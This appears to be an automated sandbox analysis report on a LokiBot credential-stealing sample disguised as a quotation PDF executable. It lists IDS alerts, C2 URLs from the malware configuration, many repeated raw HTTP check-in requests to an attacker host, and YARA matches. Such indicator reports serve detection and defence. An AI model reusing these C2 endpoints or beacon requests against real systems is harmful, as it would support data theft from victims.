              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49853 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49853 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49854 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49854 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49854 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49855 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49855 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49855 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49856 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49856 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49856 -> 104.223.93.105:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
              Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
              Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 16:28:12 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 16:28:14 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: Cotizaci#U00f3npdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Cotizaci#U00f3npdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://slimpackage.com/slimmain/five/fre.php
              Source: Cotizaci#U00f3npdf.exe, Cotizaci#U00f3npdf.exe, 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 192Connection: close
              Source: unknownDNS traffic detected: queries for: slimpackage.com
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_00404ED4 recv,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: Cotizaci#U00f3npdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
